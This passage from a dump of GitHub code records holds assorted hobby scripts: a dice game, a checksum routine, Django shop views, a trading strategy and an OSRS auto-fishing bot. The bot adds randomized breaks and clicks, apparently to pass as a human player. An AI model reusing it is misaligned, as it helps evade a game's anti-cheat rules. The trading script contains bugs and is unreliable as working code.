start_button.rect.collidepoint(event.pos):\n # Keeping track of actual time\n if play == False:\n play = True\n\n screen.fill((189, 255, 255))\n\n if start_button.draw():\n if play == False:\n play = True\n time_when_pressed = pygame.time.get_ticks()\n\n positions = [first_surf, second_surf,\n third_surf, fourth_surf, fifth_surf]\n players = {\n (300, 560): rand[0] + rand[1] + 2,\n (500, 410): rand[2] + rand[3] + 2,\n (100, 410): rand[4] + rand[5] + 2,\n (300, 160): rand[6] + rand[7] + 2,\n }\n # Bringing the surface (image) and rectangle (coordinate) to blit (display) the die once play_button has been pressed.\n if play == True:\n\n for id, dice in enumerate(dice_rects):\n current_time = pygame.time.get_ticks()\n tie = False\n # If first loop, reset background\n if id == 0:\n screen.fill((189, 255, 255))\n\n # Conditional Statements checking from the time that the button has pressed.\n if id < 2:\n screen.blit(dice_surfs[rand[id]], (dice_rects[id]))\n\n elif id < 4:\n if current_time - time_when_pressed >= 500:\n screen.blit(dice_surfs[rand[id]], (dice_rects[id]))\n\n elif id < 6:\n if current_time - time_when_pressed >= 1000:\n screen.blit(dice_surfs[rand[id]], (dice_rects[id]))\n\n elif id < 8:\n if current_time - time_when_pressed >= 1500:\n screen.blit(dice_surfs[rand[id]], (dice_rects[id]))\n\n rank = sorted(players.items(), key=itemgetter(1), reverse=True)\n\n if current_time - time_when_pressed >= 2000:\n if rank[0][1] == rank[1][1]:\n tie = True\n for i, v in enumerate(rank):\n if i == 2:\n break\n screen.blit(\n positions[4], positions[i].get_rect(center=v[0]))\n positions = positions[2:]\n rank = rank[2:]\n\n elif rank[0][1] == rank[2][1]:\n tie = True\n for i, v in enumerate(rank):\n if i == 3:\n break\n screen.blit(\n positions[4], positions[i].get_rect(center=v[0]))\n positions = positions[3:]\n rank = rank[3:]\n\n for i, v in enumerate(rank):\n screen.blit(\n positions[i], positions[i].get_rect(center=v[0]))\n\n if again_button.draw():\n play = False\n again_button.reset()\n # Updating the screen and defining the framerate.\n \n pygame.display.update()\n clock.tick(60)\n","repo_name":"paulo-desouza/python-minigames","sub_path":"dice-game/DiceGame.py","file_name":"DiceGame.py","file_ext":"py","file_size_in_byte":6492,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"36178098588","text":"# RFC 1071 - Computing the Internet Checksum\ndef ip_checksum(data: bytes) -> int:\n checksum = 0\n for i in range(0, len(data), 2):\n if i + 1 < len(data):\n checksum += (data[i] << 8) + data[i + 1]\n else:\n checksum += data[i] << 8\n checksum = (checksum >> 16) + (checksum & 0xffff)\n checksum = ~checksum & 0xffff\n return checksum\n","repo_name":"kpbs5/netsec_assignment2","sub_path":"checksum1071.py","file_name":"checksum1071.py","file_ext":"py","file_size_in_byte":378,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"19290472269","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\nClass for breaking strings into symbols\nand return a list of each symbol.\n\"\"\"\nimport inspect\nfrom symbols import *\n\nL_USER = 'dear berry'\n\n# another lex would be to identify blobks first this is a side effect\nMATH_OPS = ['+', '-', '*', '/']\nBOOLS = [S.TRUE, S.FALSE]\nBOOL_OPS = [S.GREATER, S.LESS]\nEOS = [S.NL, S.EOF]\n\nclass GreenBerryLex():\n def __init__(self):\n print(self, 'does not have an initialiser')\n\n def lex(x, KWDs, add_eof=''):\n '''\n breaks string into symbols and ids\n returns list\n\n x - source string\n KWDs - keywords/symbols\n '''\n words = []\n cup = ''\n for i, elem in enumerate(x):\n if elem != ' ':\n cup += elem\n if i+1 >= len(x) or x[i+1] == ' ' or x[i+1] in KWDs or elem in KWDs:\n if cup != '':\n words.append(cup)\n cup = ''\n\n if add_eof == 1:\n words.append(S.EOF)\n\n return words\n","repo_name":"Rutujavd/greenBerry","sub_path":"greenberry/gb_utils/greenberry_lex.py","file_name":"greenberry_lex.py","file_ext":"py","file_size_in_byte":1016,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"31"} +{"seq_id":"23350465060","text":"import dualgrid as dg\nimport matplotlib.pyplot as plt\n\nbasis = dg.utils.icosahedral_basis()\n\nfilt_dist = 1.5\ncells = dg.dualgrid_method(basis, k_range=3)\n# Take a chunk of the crystal out of the middle\ncells = dg.utils.filter_cells(cells, filter=dg.utils.is_point_within_cube, filter_args=[filt_dist])\nG = dg.utils.graph_from_cells(cells) # Make graph\nprint(\"Generated graph.\")\n\n# Generate & save a mesh.\nprint(\"Saving mesh to ./graph_out.stl ...\")\ndg.utils.export_graph_to_stl(G, \"graph_out.stl\", 0.1)\n","repo_name":"joshcol9232/tiling","sub_path":"example_stl.py","file_name":"example_stl.py","file_ext":"py","file_size_in_byte":503,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"72041328087","text":"from src.api.factory.exceptions.service_exceptions.db_service_exceptions.attendee_exceptions import \\\n InvalidMeetingPermissionException, InvalidCoordinatorException\nfrom src.api.factory.exceptions.service_exceptions.db_service_exceptions.meeting_exceptions import \\\n InvalidMeetingIdException\nfrom src.api.pool.services.attendee_services import AttendeeFormService, MeetingUser\nfrom src.database.postgres.user import User\nfrom .. import AttendeeAuthDecorator\n\n\nclass ChangeCoordinatorDecorator(AttendeeAuthDecorator):\n def update_model(self, *args, **kwargs) -> bool:\n \"\"\"\n Update is_coordinator fields on MeetingUser table\n :param args:\n :param kwargs:\n :return:\n \"\"\"\n meeting_id = kwargs['meeting_id']\n coordinator_id = kwargs['coordinator_id']\n\n attendee_service = AttendeeFormService()\n current_coordinator = attendee_service.get_meeting_coordinator(meeting_id=meeting_id)\n\n # check valid meeting id\n if current_coordinator:\n if self.__check_valid_coordinator_permission(current_coordinator):\n # set current meeting coordinator to normal meeting attendee\n current_coordinator.is_coordinator = False\n if super().update_model(updated_model=current_coordinator):\n # update new coordinator\n new_coordinator = attendee_service.get_meeting_user(meeting_id=meeting_id,\n user_id=coordinator_id)\n # check valid new coordinator\n if self.__check_activated_coordinator(new_coordinator):\n new_coordinator.is_coordinator = True\n if super().update_model(updated_model=new_coordinator):\n self.commit()\n return True\n else:\n self.rollback()\n else:\n raise InvalidCoordinatorException()\n else:\n raise InvalidMeetingPermissionException()\n else:\n raise InvalidMeetingIdException()\n\n\n @staticmethod\n def __check_activated_coordinator(coordinator) -> bool:\n \"\"\"\n Check if coordinator had logged in before\n :param coordinator: A User model instance of Meeting coordinator\n :return: True if coordinator's is_activated field is True, otherwise, return False\n \"\"\"\n if isinstance(coordinator, MeetingUser):\n new_coordinator_user = coordinator.user\n if isinstance(new_coordinator_user, User):\n if new_coordinator_user.is_activated:\n return True\n return False\n\n def __check_valid_coordinator_permission(self, coordinator) -> bool:\n \"\"\"\n Check if self's auth_user is the coordinator of the meeting\n :param coordinator: A User model instance of Meeting coordinator\n :return: True if auth_user and coordinator is the same user, otherwise, return False\n \"\"\"\n if isinstance(coordinator, MeetingUser):\n auth_user = self.get_authenticated_user()\n coordinator_user = coordinator.user\n if isinstance(coordinator_user, User):\n if coordinator_user.id == auth_user.id:\n return True\n return False\n","repo_name":"enixdark/meeting-training-app","sub_path":"backend/src/api/pool/decorators/attendee_decorators/change_coordinator_decorator/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3420,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"11015200886","text":"class Solution:\n def evalRPN(self, tokens):\n \"\"\"\n :type tokens: List[str]\n :rtype: int\n \"\"\"\n if not tokens:\n return None\n stack_list = []\n while(tokens):\n t = tokens.pop(0)\n print(t)\n if t.lstrip('-').isdigit():\n # 注意isdigit不可以对负数用\n stack_list.append(int(t))\n else:\n print(stack_list)\n a1 = (stack_list.pop(-1))\n a2 = (stack_list.pop(-1))\n if t == \"+\":\n ans= a2 + a1\n elif t == \"-\":\n ans = a2 - a1\n elif t == \"*\":\n ans = a2 * a1\n else:\n ans = int(a2 / a1)\n\n stack_list.append((ans))\n return stack_list[0]\n\n\n\n\n\ntoken = [\"10\", \"6\", \"9\", \"3\", \"+\", \"-11\", \"*\", \"/\", \"*\", \"17\", \"+\", \"5\", \"+\"]\ns = Solution()\nprint(s.evalRPN(token))","repo_name":"NeilWangziyu/Leetcode_py","sub_path":"evalRPN.py","file_name":"evalRPN.py","file_ext":"py","file_size_in_byte":984,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"6924235441","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Jun 14 13:53:07 2017\n\n@author: Eliza Wallace\n\nCount Overlap tool\nTool that counts the features that overlap each polygon in a feature class.\n\n\"\"\"\nimport arcpy\nimport sys\n\ncatchments = arcpy.GetParameterAsText(0)\nfeatures = arcpy.GetParameterAsText(1)\nfieldname = arcpy.GetParameterAsText(2)\nidfield = arcpy.GetParameterAsText(3)\n\n#fcdescr = arcpy.Describe(features)\n#shape = str(fcdescr.shapeType)\n\n# function that adds a suffix to a field name if it already exists\ndef AutoName(raster):\n raster = raster.replace(' ','') # removes spaces from layer name for ESRI GRID format\n checkraster = arcpy.Exists(raster) # checks to see if the raster already exists\n count = 2\n newname = raster\n\n while checkraster == True: # if the raster already exists, adds a suffix to the end and checks again\n newname = raster + str(count)\n count += 1\n checkraster = arcpy.Exists(newname)\n\n return newname\n\ntry: \n # spatial joins features to catchments \n sjoutput = AutoName(\"spatialjoin\")\n arcpy.SpatialJoin_analysis(catchments,features,sjoutput,\"JOIN_ONE_TO_MANY\",\"KEEP_COMMON\")\n\n # counts features joined to each catchment\n statsoutput = AutoName(\"statsoutput\")\n arcpy.Statistics_analysis(sjoutput, statsoutput,[[\"Join_Count\",\"SUM\"]], idfield)\n\n # adds the specified field name to the feature class\n arcpy.AddField_management(statsoutput, fieldname, \"SHORT\") \n \n # copies the count of features to the new field\n arcpy.CalculateField_management(statsoutput, fieldname,\"!SUM_Join_Count!\", \"PYTHON\")\n \n # joins the new field to the catchment feature class\n arcpy.JoinField_management(catchments,idfield,statsoutput,idfield,[fieldname])\n \nexcept Exception:\n e = sys.exc_info()[1]\n print(e.args[0])\n arcpy.AddError(e.args[0])\n \n \n \n ","repo_name":"eliza-wallace/ArcGIS_Tools","sub_path":"countoverlap.py","file_name":"countoverlap.py","file_ext":"py","file_size_in_byte":1858,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"1715577764","text":"from django.shortcuts import render, get_object_or_404, redirect\nfrom core.models import Item, OrderItem, Order, BillingAddress, Coupon\nfrom django.views.generic import ListView, View, DetailView\nfrom django.utils import timezone\nfrom django.contrib import messages\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.auth.mixins import LoginRequiredMixin\nfrom core.forms import CheckoutForm, CouponForm\n\n# Create your views here.\n\n\ndef products(request):\n context = {\n 'items': Item.objects.all()\n }\n return render(request, \"products.html\", context)\n\n\nclass CheckoutView(View):\n def get(self, *args, **kwargs):\n try:\n order = Order.objects.get(user=self.request.user, ordered=False)\n form = CheckoutForm()\n context = {'form': form, 'couponform': CouponForm(),\n 'order': order, 'DISPLAY_COUPON_FORM': False}\n return render(self.request, \"checkout.html\", context)\n except ObjectDoesNotExist:\n messages.info(self.request, \"Your cart is Empty\")\n return redirect(\"core:checkout\")\n\n def post(self, *args, **kwargs):\n form = CheckoutForm(self.request.POST or None)\n try:\n order = Order.objects.get(user=self.request.user, ordered=False)\n if form.is_valid():\n street_address = form.cleaned_data.get('street_address')\n district = form.cleaned_data.get('district')\n country = form.cleaned_data.get('country')\n zip = form.cleaned_data.get('zip')\n # same_shipping_address = form.cleaned_data.get(\n # 'same_shipping_address')\n # save_info = form.cleaned_data.get('save_info')\n payment_option = form.cleaned_data.get('payment_option')\n billing_address = BillingAddress(\n user=self.request.user,\n street_address=street_address,\n district=district,\n country=country,\n zip=zip,\n )\n billing_address.save()\n order.billing_address = billing_address\n order.save()\n if payment_option == 'MM':\n return redirect('core:payment', payment_option='mobilemoney')\n elif payment_option == 'COD':\n messages.success(\n self.request, \"Your Order is to be paid for when delivered\")\n else:\n messages.warning(\n self.request, \"Invalid Payment Option Selected\")\n return redirect('core:checkout')\n\n except ObjectDoesNotExist:\n messages.warning(self.request, \"Your Shopping Cart is Empty\")\n return redirect(\"core:order-summary\")\n\n\nclass PaymentView(View):\n def get(self, *args, **kwargs):\n order = Order.objects.get(user=self.request.user, ordered=False)\n if order.billing_address:\n context = {'order': order, 'DISPLAY_COUPON_FORM': False}\n return render(self.request, 'payment.html')\n else:\n messages.warning(\n self.request, \"You have not completed the checkout page\")\n return redirect(\"core:checkout\")\n\n\nclass HomeView(ListView):\n model = Item\n paginate_by: int = 10\n template_name: \"home.html\"\n\n\nclass OrderSummaryView(LoginRequiredMixin, View):\n def get(self, *args, **kwargs):\n try:\n order = Order.objects.get(user=self.request.user, ordered=False)\n context = {'object': order}\n return render(self.request, \"order_summary.html\", context)\n except ObjectDoesNotExist:\n messages.warning(self.request, \"Your Shopping Cart is Empty\")\n return redirect(\"/\")\n\n\nclass ItemDetailView(DetailView):\n model = Item\n template_name: \"product.html\"\n\n\n@login_required\ndef add_to_cart(request, slug):\n item = get_object_or_404(Item, slug=slug)\n order_item, created = OrderItem.objects.get_or_create(\n item=item, user=request.user, ordered=False)\n order_qs = Order.objects.filter(user=request.user, ordered=False)\n if order_qs.exists():\n order = order_qs[0]\n # check if the order item is in the order\n if order.items.filter(item__slug=item.slug).exists():\n order_item.quantity += 1\n order_item.save()\n messages.info(request, \"This item quantity was updated\")\n return redirect(\"core:order-summary\")\n else:\n messages.info(request, \"This item was added to your cart\")\n order.items.add(order_item)\n return redirect(\"core:order-summary\")\n else:\n ordered_date = timezone.now()\n order = Order.objects.create(\n user=request.user, ordered_date=ordered_date)\n order.items.add(order_item)\n messages.info(request, \"This item was added to your cart\")\n return redirect(\"core:order-summary\")\n\n\n@login_required\ndef remove_from_cart(request, slug):\n item = get_object_or_404(Item, slug=slug)\n order_qs = Order.objects.filter(user=request.user, ordered=False)\n if order_qs.exists():\n order = order_qs[0]\n # check if the order item is in the order\n if order.items.filter(item__slug=item.slug).exists():\n order_item = OrderItem.objects.filter(\n item=item, user=request.user, ordered=False)[0]\n order.items.remove(order_item)\n messages.info(request, \"This item was removed to your cart\")\n return redirect(\"core:order-summary\")\n else:\n # message\n messages.info(request, \"Could not find Item\")\n return redirect(\"core:product\", slug=slug)\n else:\n # message\n messages.info(request, \"Your Cart is empty\")\n return redirect(\"core:product\", slug=slug)\n\n\n@login_required\ndef remove_single_item_from_cart(request, slug):\n item = get_object_or_404(Item, slug=slug)\n order_qs = Order.objects.filter(user=request.user, ordered=False)\n if order_qs.exists():\n order = order_qs[0]\n # check if the order item is in the order\n if order.items.filter(item__slug=item.slug).exists():\n order_item = OrderItem.objects.filter(\n item=item, user=request.user, ordered=False)[0]\n if order_item.quantity > 1:\n order_item.quantity -= 1\n order_item.save()\n else:\n order.items.remove(order_item)\n messages.info(request, \"This item was updated\")\n return redirect(\"core:order-summary\")\n else:\n # message\n messages.info(request, \"Could not find Item\")\n return redirect(\"core:product\", slug=slug)\n else:\n # message\n messages.info(request, \"Your Cart is empty\")\n return redirect(\"core:product\", slug=slug)\n\n\ndef get_coupon(request, code):\n try:\n coupon = Coupon.objects.get(code=code)\n return coupon\n except ObjectDoesNotExist:\n messages.info(request, \"This coupon does not exist\")\n return redirect(\"core:checkout\")\n\n\nclass AddCouponView(View):\n def post(self, *args, **kwargs):\n form = CouponForm(self.request.POST or None)\n if form.is_valid():\n try:\n code = form.cleaned_data.get('code')\n order = Order.objects.get(\n user=self.request.user, ordered=False)\n order.coupon = get_coupon(self.request, code)\n order.save()\n messages.success(self.request, \"Successfully added coupon\")\n return redirect('core:checkout')\n\n except ObjectDoesNotExist:\n messages.info(self.request, \"Your Cart is empty\")\n return redirect(\"core:checkout\")\n","repo_name":"StuartKirunda/Django-Ecommerce","sub_path":"core/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7966,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"25059677523","text":"import sys\nimport signal\nfrom random import random,choice\nfrom math import floor\nfrom time import sleep\nfrom subprocess import call\n\ndef cleanup():\n call( [ \"/etc/init.d/rainbow\", \"restart\" ])\n\n# odchyt signalu interrupt\ndef trap_sigint( signal, frame ):\n sys.stderr.write( \"Chycen SIGINT, uklizim a koncim.\\n\")\n uklid()\n sys.exit(0)\n\n#signal.signal( signal.SIGINT, trap_sigint )\n\n\nusage = \"\"\"USAGE:\n %s\n\"\"\" % sys.argv[0]\n\n# list of Turris leds\nleds = [ 'wan', 'lan1', 'lan2', 'lan3', 'lan4', 'lan5', 'wifi', 'pwr' ]\n\n# seznam barev, ktere ma stridat\ncolors = [\n \"00FF00\",\n \"0000AA\",\n \"FF6600\",\n \"FF0000\",\n \"009900\"\n ]\n\nif ( len(sys.argv) < 1 ):\n sys.stderr.write(usage)\n exit(1)\n\ncall([ \"rainbow\", \"all\", \"disable\" ])\ncall([ \"rainbow\", \"all\", \"red\" ])\n\n\nfor idx, i in enumerate(leds):\n ranval = random()\n print(ranval)\n if ranval >= 0.4:\n #print(\"rainbow\", i, \"enable\")\n call([\"rainbow\", i, \"enable\"])\n sleep(1 + (0.3 * idx))\n else:\n #call([\"rainbow\", \"all\", \"disable\"])\n for i in range(5):\n call([\"rainbow\", \"all\", choice(colors)])\n sleep(0.25)\n call([\"rainbow\", \"all\", \"red\"])\n sys.exit()\nfor i in range(25):\n call([\"rainbow\", \"all\", choice(colors)])\n sleep(0.15)\ncall([\"rainbow\", \"all\", \"disable\"])\n#cleanup()\n","repo_name":"filiptronicek/Turris","sub_path":"roulette.py","file_name":"roulette.py","file_ext":"py","file_size_in_byte":1387,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"41830880645","text":"# 导入函数库\nfrom jqdata import *\n\n# 均线\nMA_WIN_1 = 10\nMA_WIN_2 = 60\n\n\n# 设置仓位管理系统。\n\n\n# 初始化函数,设定基准等等\ndef initialize(context):\n set_benchmark('000300.XSHG')\n set_option('use_real_price', True)\n # log.set_level('order', 'error')\n\n # 股票类每笔交易时的手续费是:买入时佣金万分之三,卖出时佣金万分之三加千分之一印花税, 每笔交易佣金最低扣5块钱\n\n # 定时运行函数\n run_daily(before_market_open, time='before_open', reference_security='000300.XSHG')\n run_daily(market_open, time='every_bar', reference_security='000300.XSHG')\n # run_daily(after_market_close, time='after_close', reference_security='000300.XSHG')\n # 股票池 - 上证50\n # g.stock_pool = get_index_stocks(\"000016.XSHG\", date=context.current_dt)\n g.stock_pool = '510300.XSHG'\n g.init_cash = context.portfolio.starting_cash # 启动资金\n g.down_cross_signaled = []\n\n\n# 开盘前运行函数 ,定义股票池\ndef before_market_open(context):\n look_ahead_n = max(MA_WIN_1, MA_WIN_2) + 1\n g.up_cross_signaled = set()\n g.down_cross_signaled = set()\n\n df = attribute_history(g.stock_pool, look_ahead_n, \"1d\", [\"close\"], skip_paused=True) # 该函数返回结果不包括当天数据\n if len(df) != look_ahead_n:\n continue\n close = df[\"close\"]\n ma_short = close.rolling(MA_WIN_1).mean() # 短时均线\n ma_long = close.rolling(MA_WIN_2).mean() # 长时均线\n uc_flags = (ma_short.shift(1) <= ma_long.shift(1)) & (ma_short > ma_long) # 上穿标志\n dc_flags = (ma_short.shift(1) >= ma_long.shift(1)) & (ma_short < ma_long) # 下穿标志\n # 股票列表\n if uc_flags.iloc[-1]:\n g.up_cross_signaled.add(g.stock_pool)\n # if dc_flags.iloc[-1]:\n # g.down_cross_signaled.add(g.stock_pool)\n\n\n# 开盘时运行函数,定义交易规则\ndef market_open(context):\n cur_dt = context.current_dt.date() # 当前日期\n # p = context.portfolio # 资金账户\n current_data = get_current_data()\n # open_price = current_data[code].day_open\n each_cash = g.init_cash * 0.3 # 每只股票分配的资金\n each_cash1 = g.init_cash * 0.6\n\n amount = context.portfolio.positions[g.stock_pool].total_amount\n cost = context.portfolio.positions[g.stock_pool].avg_cos\n p = get_current_data()[g.stock_pool].last_price\n\n # 买入均线金叉信号的持仓股 /1/3仓位\n for code in g.up_cross_signaled:\n if current_data[code].paused:\n continue\n order_value(code, each_cash)\n\n if amount > 0 and p >= cost * 1.1:\n order_value(g.stock_pool, each_cash1) # 加仓,全部卖出\n if amount > 0 and p >= cost * 1.25:\n order_target(g.stock_pool, 0) # 止盈一部分,全部卖出\n if amount > 0 and p <= cost * 0.9:\n order_target(g.stock_pool, 0) # 止损,全部卖出\n\n\n\n#\n# 收盘后运行函数\n# def after_market_close(context):\n\n\n\n\n\n # p = context.portfolio\n # pos_level = p.positions_value / p.total_value\n # record(pos_level=pos_level)\n","repo_name":"Sakura-BAI/meituan01","sub_path":"stock/test01.py","file_name":"test01.py","file_ext":"py","file_size_in_byte":3097,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"70092096728","text":"from enum import Enum\nfrom typing import List, Optional, Tuple\n\nimport torch\nfrom basic_nn import BasicNet\n\nfrom spock import SpockBuilder\nfrom spock import spock\n\n\nclass Activation(Enum):\n relu = \"relu\"\n gelu = \"gelu\"\n tanh = \"tanh\"\n\n\nclass Optimizer(Enum):\n sgd = \"SGD\"\n adam = \"Adam\"\n\n\n@spock\nclass ModelConfig:\n n_features: int\n dropout: Optional[List[float]]\n hidden_sizes: Tuple[int, int, int] = (32, 32, 32)\n activation: Activation = \"relu\"\n optimizer: Optimizer\n cache_path: Optional[str]\n\n\n@spock\nclass DataConfig:\n batch_size: int = 2\n n_samples: int = 8\n cache_path: Optional[str]\n\n\n@spock\nclass OptimizerConfig:\n lr: float = 0.01\n n_epochs: int = 2\n grad_clip: Optional[float]\n\n\n@spock\nclass SGDConfig(OptimizerConfig):\n weight_decay: float\n momentum: float\n nesterov: bool\n\n\ndef train(x_data, y_data, model, model_config, data_config, optimizer_config):\n if model_config.optimizer == \"SGD\":\n optimizer = torch.optim.SGD(\n model.parameters(),\n lr=optimizer_config.lr,\n momentum=optimizer_config.momentum,\n nesterov=optimizer_config.nesterov,\n )\n elif model_config.optimizer == \"Adam\":\n optimizer = torch.optim.Adam(model.parameters(), lr=optimizer_config.lr)\n else:\n raise ValueError(f\"Optimizer choice {optimizer_config.optimizer} not available\")\n n_steps_per_epoch = data_config.n_samples % data_config.batch_size\n for epoch in range(optimizer_config.n_epochs):\n for i in range(n_steps_per_epoch):\n # Ugly data slicing for simplicity\n x_batch = x_data[\n i * n_steps_per_epoch : (i + 1) * n_steps_per_epoch,\n ]\n y_batch = y_data[\n i * n_steps_per_epoch : (i + 1) * n_steps_per_epoch,\n ]\n optimizer.zero_grad()\n output = model(x_batch)\n loss = torch.nn.CrossEntropyLoss(output, y_batch)\n loss.backward()\n if optimizer_config.grad_clip:\n torch.nn.utils.clip_grad_value(\n model.parameters(), optimizer_config.grad_clip\n )\n optimizer.step()\n print(f\"Finished Epoch {epoch+1}\")\n\n\ndef main():\n # A simple description\n description = \"spock Advanced Tutorial\"\n # Build out the parser by passing in Spock config objects as *args after description\n config = SpockBuilder(\n ModelConfig, DataConfig, SGDConfig, desc=description\n ).generate()\n # Instantiate our neural net using\n basic_nn = BasicNet(model_config=config.ModelConfig)\n # Make some random data (BxH): H has dim of features in\n x_data = torch.rand(config.DataConfig.n_samples, config.ModelConfig.n_features)\n y_data = torch.randint(0, 3, (config.DataConfig.n_samples,))\n # Run some training\n train(\n x_data,\n y_data,\n basic_nn,\n config.ModelConfig,\n config.DataConfig,\n config.SGDConfig,\n )\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"fidelity/spock","sub_path":"examples/tutorial/advanced/tutorial.py","file_name":"tutorial.py","file_ext":"py","file_size_in_byte":3043,"program_lang":"python","lang":"en","doc_type":"code","stars":106,"dataset":"github-code","pt":"31"} +{"seq_id":"34094701658","text":"import math\na = input(\"podaj pierwszy bok a= \")\nb = input(\"podaj drugi bok b= \")\nc = input(\"podaj trzeci bok c= \")\n\ndef poleTrojkata(a,b,c):\n if a.isnumeric() and b.isnumeric() and c.isnumeric():\n a = int(a)\n b = int(b)\n c = int(c)\n if a <=0 or b <=0 or c <=0:\n print(\"zla wartość lamusie\")\n return -1\n if a c:\r\n options[a]()\r\n newTime_break = True\r\n\r\n\r\ndef randomizer(timer_breaks, ibreaks):\r\n global newTime_break\r\n global timer_break\r\n global ibreak\r\n random_break(timer_breaks, ibreaks)\r\n if newTime_break == True:\r\n timer_break = timer()\r\n ibreak = random.randrange(600, 2000)\r\n newTime_break = False\r\n\r\n # b = random.uniform(4, 5)\r\n\r\n\r\ndef timer():\r\n startTime = time.time()\r\n return startTime\r\n\r\n\r\ndef random_pause():\r\n b = random.uniform(20, 250)\r\n print('pausing for ' + str(b) + ' seconds')\r\n time.sleep(b)\r\n newTime_break = True\r\n\r\n\r\npytesseract.pytesseract.tesseract_cmd = r'C:\\Program Files\\Tesseract-OCR\\tesseract'\r\niflag = False\r\n\r\noptions = {0: random_inventory,\r\n 1: random_combat,\r\n 2: random_skills,\r\n 3: random_quests,\r\n 4: random_pause}\r\n\r\n\r\ndef drop_fish():\r\n print(\"dropping fish starting...\")\r\n invent_crop()\r\n drop_item()\r\n image_Rec_clicker(r'prawn_fish.png', 'dropping item', 5, 5, 0.9, 'left', 10, 620, 480, False)\r\n image_Rec_clicker(r'trout_fish.png', 'dropping item', 5, 5, 0.9, 'left', 10, 620, 480, False)\r\n image_Rec_clicker(r'salmon_fish.png', 'dropping item', 5, 5, 0.9, 'left', 10, 620, 480, False)\r\n image_Rec_clicker(r'lobster_fish.png', 'dropping item', 5, 5, 0.9, 'left', 10, 620, 480, False)\r\n release_drop_item()\r\n print(\"dropping fish done\")\r\n\r\n\r\ndef pick_random_fishing_spot(type):\r\n Image_Rec_single(type + '.png', 'picking fishing spot', 5, 5, 0.7, 'left', 10)\r\n\r\n\r\ndef powerfisher(type):\r\n j = 0\r\n while j < 10:\r\n randomizer(timer_break, ibreak)\r\n resizeImage()\r\n fished = Image_to_Text('thresh', 'textshot.png')\r\n # print(fished)\r\n if fished.lower() != 'fishing' and fished.lower() != 'plt]' and fished.lower() != 'ele]':\r\n random_breaks(0.2, 3)\r\n pick_random_fishing_spot(type)\r\n random_breaks(5, 10)\r\n if skill_lvl_up() != 0:\r\n print('level up')\r\n random_breaks(0.2, 3)\r\n pyautogui.press('space')\r\n random_breaks(0.1, 3)\r\n pyautogui.press('space')\r\n a = random.randrange(0, 2)\r\n # print(a)\r\n spaces(a)\r\n # invent_crop()\r\n invent = Image_count(type + '.png') + Image_count(r'sea_puzzle.png')\r\n print(\"fish & clues: \", invent)\r\n if type == 'prawn_fish' or type == 'lobster_fish':\r\n z = 26\r\n else:\r\n z = 25\r\n if invent > z - 2:\r\n random_breaks(0.2, 0.7)\r\n drop_fish()\r\n random_breaks(0.2, 0.7)\r\n pick_random_fishing_spot(type)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n time.sleep(2)\r\n resizeImage()\r\n x = random.randrange(100, 250)\r\n y = random.randrange(400, 500)\r\n pyautogui.click(x, y, button='right')\r\n ibreak = random.randrange(300, 2000)\r\n print('will break in ' + str(ibreak / 60) + ' minutes')\r\n timer_break = timer()\r\n powerfisher('prawn_fish')\r\n","repo_name":"EduardTruggelaar/osrs_basic_botting_functions","sub_path":"fishing.py","file_name":"fishing.py","file_ext":"py","file_size_in_byte":4177,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"31"} +{"seq_id":"18375718937","text":"import os\nfrom pathlib import Path\n\n#\n# The version number of pygit2\n#\n__version__ = '1.13.3'\n\n\n#\n# Utility functions to get the paths required for bulding extensions\n#\ndef _get_libgit2_path():\n # LIBGIT2 environment variable takes precedence\n libgit2_path = os.getenv('LIBGIT2')\n if libgit2_path is not None:\n return Path(libgit2_path)\n\n # Default\n if os.name == 'nt':\n return Path(r'%s\\libgit2' % os.getenv('ProgramFiles'))\n return Path('/usr/local')\n\n\ndef get_libgit2_paths():\n # Base path\n path = _get_libgit2_path()\n\n # Library dirs\n libgit2_lib = os.getenv('LIBGIT2_LIB')\n if libgit2_lib is None:\n library_dirs = [path / 'lib', path / 'lib64']\n else:\n library_dirs = [libgit2_lib]\n\n include_dirs = [path / 'include']\n return (\n path / 'bin',\n {\n 'libraries': ['git2'],\n 'include_dirs': [str(x) for x in include_dirs],\n 'library_dirs': [str(x) for x in library_dirs],\n }\n )\n","repo_name":"libgit2/pygit2","sub_path":"pygit2/_build.py","file_name":"_build.py","file_ext":"py","file_size_in_byte":1006,"program_lang":"python","lang":"en","doc_type":"code","stars":1533,"dataset":"github-code","pt":"31"} +{"seq_id":"18923219934","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Nov 2 23:12:46 2019\n\n@author: isadora\n\"\"\"\n\nimport random\nimport numpy as np\nimport pandas as pd\nfrom os.path import join\nfrom datetime import datetime\nfrom itertools import product\n\nfrom src.utilities.utils import create_folder, get_files\nfrom src.classification.motion import MotionDataset\nfrom src.classification.model_classification import Classification\n\n\nnp.random.seed(321)\n\n\nclass OPClassification:\n \"\"\" It classifies motion (extracting point features from it) and OP features.\n \n Parameters\n ----------\n op_values : nested lists\n OP Transformation parameters (D, tau) used to classify\n ex: [[3, 1], [3, 1]]\n \n motion_features : list of str\n motion feature names\n \n folder_op : str\n absolute path where the op features are\n \n folder_features : str\n absolute path where the motion feature data is\n \n folder_classification : str\n absolute path where to save the classification results\n (we add the time to each data, so the 